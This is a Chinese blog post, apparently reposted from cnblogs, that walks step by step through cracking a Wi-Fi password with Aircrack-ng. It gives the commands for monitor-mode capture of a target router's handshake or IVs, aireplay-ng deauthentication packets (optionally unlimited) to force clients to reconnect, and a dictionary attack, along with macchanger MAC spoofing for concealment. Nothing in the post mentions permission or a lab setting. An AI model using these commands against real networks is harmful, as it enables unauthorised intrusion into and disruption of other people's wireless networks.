• 无线密码获取


    1、命令:

    airmon-ng check kill结束进程

    airmon-ng start wlan0 加载网卡

    airodump-ng wlan0mon 建立监听

    airodump-ng -c 13 --bssid DC:FE:18:1B:42:6B -w ~/ wlan0mo

    airodump-ng --ivs -w xiaobai --bssid (mac地址) -c (信道) wlan0mon--ivs文件格式

    -w xiaobai 文件名字此时能抓到就退出抓不到把攻击对方目标,使他重新握手,抓取密文

    aireplay-ng -0 20 -a 路由器Mac地址 –c 客户机mac地址 wlan0mon

    -0 :发送工具数据包的数量,这里是20个(或者无限次攻击改成0 )这样就能获得密文

    aircrack-ng xiaobai.ivs -w 字典名

    就这样开始破解了

    2、实现步骤

    • 1. 修改无线网卡状态:先 down 掉
    • 2. 伪造无线网卡的 MAC 地址:安全起见。
    • 3. 修改网卡工作模式:进入Monitor状态,会产生一个虚拟的网卡
    • 4. 修改无线网卡状态: up
    • 5. 查看网络状态,记录下 AP 的 MAC 和本机的 MAC ,确定攻击目标
    • 6. 监听抓包:生成 .cap 或 .ivs
    • 7. 干扰无线网络:截取无线数据包,发送垃圾数据包,用来获得更多的有效数据包
    • 8. 破解 .cap 或 .ivs ,获得 WEP 密码,完成破解
    • 9、个人认为复杂的密码应该搞不出来,(因为密码复杂了字典就大了,电脑就带不动了)
    • 10、注意无线网卡必须要带有监听的才行

    3、使用到的工具

    • 1、Aircrack-ng工具包
      • 1、airmon-ng:处理网卡工作模式
      • 2、airodump-ng:抓包
      • 3、aircrack-ng:破解
      • 4、airepay-ng:发包、干扰
    • 2、ifconfig:查看修改网卡状态
      • 1、ifconfig wlan0 down:禁用网卡
      • 2、ifconfig wlan0 up:启用网卡
      • 3、目的是为了修改MAC地址
    • 3、macchanger:伪造MAC
      • -h 显示帮助
      • -V 显示版本
      • -s 显示当前MAC
      • -e 不改变mac,使用硬件厂商写入的MAC
      • -a 自动生成一个同类型的MAC,同厂商的
      • -A 自动生成一个不同类型的MAC,不同厂商的
      • -r 生成任意MAC
      • -l 显示已知厂商的网卡MAC地址分配,这个很有用,可以根据MAC查出
      • 来是哪个厂商生产的产品
      • -m 设置一个自定义的MAC
      • 如: macchanger --mac=00:34:00:00:00:00 ath0 。
    • 4、iwconfig:针对无线网卡的工具
    • 5、iwlist:获取无线网络更详细的命令
  • 相关阅读:
    Office办公软件停止工作解决方案
    Jquery blockUI用法
    IE浏览器对js代码的高要求
    IIS中应用程序切换物理路径遇到的问题
    using关键字
    剑指offer-面试题23-链表中环的入口节点-双指针
    剑指offer-面试题22-链表中倒数第k个节点-双指针
    剑指offer-面试题21-调整数组顺序使奇数位于偶数前面-双指针
    剑指offer-面试题20-表示数值的字符串-字符串
    剑指offer-面试题19-正则表达式匹配-字符串
  • 原文地址:https://www.cnblogs.com/zhouxiangfei/p/12547506.html
Copyright © 2020-2023  润新知